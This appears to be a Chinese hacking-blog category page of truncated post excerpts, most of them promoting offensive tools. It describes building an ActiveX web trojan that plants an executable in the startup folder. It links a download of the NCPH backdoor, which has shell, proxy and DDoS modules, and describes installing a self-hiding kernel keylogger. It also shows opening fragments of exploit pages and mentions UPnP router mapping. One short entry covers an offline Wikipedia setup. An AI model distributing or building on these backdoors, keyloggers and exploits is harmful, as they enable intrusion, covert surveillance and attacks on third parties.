分类 ‘工具收集’ 下的日志

Microsoft Office Snapshot Viewer ActiveX 网马的Property和Method

作者:lcx
来源:vbs小铺

测试此网马不必要装access,只需单独装一个SNAPVIEW.EXE就可以测试(微软有下),不过我没有找到这个控件的可执行的方法,只能将网马的exe用js判断系统的语言选项后放在启动项里。装ACESS的用户要小心了。下边是我eXeScope 找到此此ActiveX的Property和Method。
阅读全文 »

Tags:

hd

鬼仔注:很早之前拿到一份,但是没怎么用过,现在有人公布了。

下载地址:http://www.ncph.net/soft/hd.rar | 备用
来源:NCPH

一. 后门主要模块介绍
==========================================================================================

1. 后门服务端
a. 后门功能
b. 后门管理
c. 文件目录操作
d. 执行程序操作
e. 系统操作
f. Shell功能
g. Proxy功能
h. DDoS功能
i. HBot功能
j. 附加功能
阅读全文 »

Tags: ,

Linux 2.6.9内核键盘记录

作者:WZT
来源:WZT的自由世界

这个程序源自thc的vlogger, 我将它port到了2.6.9下, 有需要的同学可以拿去耍耍。
make;make install即可安装, 模块自动隐藏, 生成的记录文件在/tmp/kloger下, 也是隐藏掉的。

稳定性需要进一步测试, 此程序仅用于学习和交流使用。
阅读全文 »

Tags: ,

Microsoft Office Snapshot Viewer ActiveX Exploit

来源:http://hi.baidu.com/cloie/

今天有人发了个Snapshot Viewer的ADV,结合CERT那篇dranzer.pdf,重现漏洞

EXP:


<html>
<object classid='clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9' id='obj'></object>
<script language='javascript'>
 阅读全文 »
Tags: , ,

Ratproxy — Google 的 XSS 检测工具

作者: Fenng
网址:

跨站脚本攻击(XSS, Cross Site Scripting) 可能是目前所有网站都比较头疼的问题,Google 也不例外。这次 Google 又做了一次雷锋,把内部用来审计 XSS 的工具开源了:ratproxy
阅读全文 »

Tags: , ,

风讯注入exp(hta版)

作者:lcx

<SCRIPT LANGUAGE="VBScript">
Sub Window_onLoad
window.resizeTo 450,380
window.moveTo 300, 300
End Sub
</SCRIPT>
 阅读全文 »
Tags: , ,

iPhone上的离线维基百科(附安装方法)

原帖见

Wiki2Touch:http://code.google.com/p/wiki2touch/
Wiki2Touch的界面截图:http://www.haukap.com/wiki2touch/

但是原帖写的很乱,我刚开始都没看懂什么意思。整理了下,说下的安装方法(文章中的软件,工具及数据都是发日志时最新的,请自行查找更新的版本,是在windows下做的):

1、到维基网页下载想安装的维基数据包 http://download.wikimedia.org/backup-index.html
中文维基是zhwiki,我下载的是08年6月25日的数据,也是目前最新的:
下载页面:http://download.wikimedia.org/zhwiki/20080625/
一般只需要pages-articles.xml.bz2就够了,直接下载地址:zhwiki-20080625-pages-articles.xml.bz2
阅读全文 »

Tags: ,

UpnpFuzz

作者:cnqing

这个东西是去年当哥提出来的,据说一些后门木马也用Upnp做NAT了。 当然UpnpFuzz不仅仅是开Nat,当我不知道路由密码,而路由开启了Upnp的时候,用它就很容易的把自己映射到外网了。撇开功能不谈,Upnp 还是比较具有前瞻性的。
UpnpFuzz是一个通用的无驱Upnp客户端     可发现任意的Upnp设备     扫描所有的方法和参数     生成所有的执行方法  使用方法 选择扫描类型,点扫描,就会列出网络中存在的Upnp设备了。
阅读全文 »

Tags: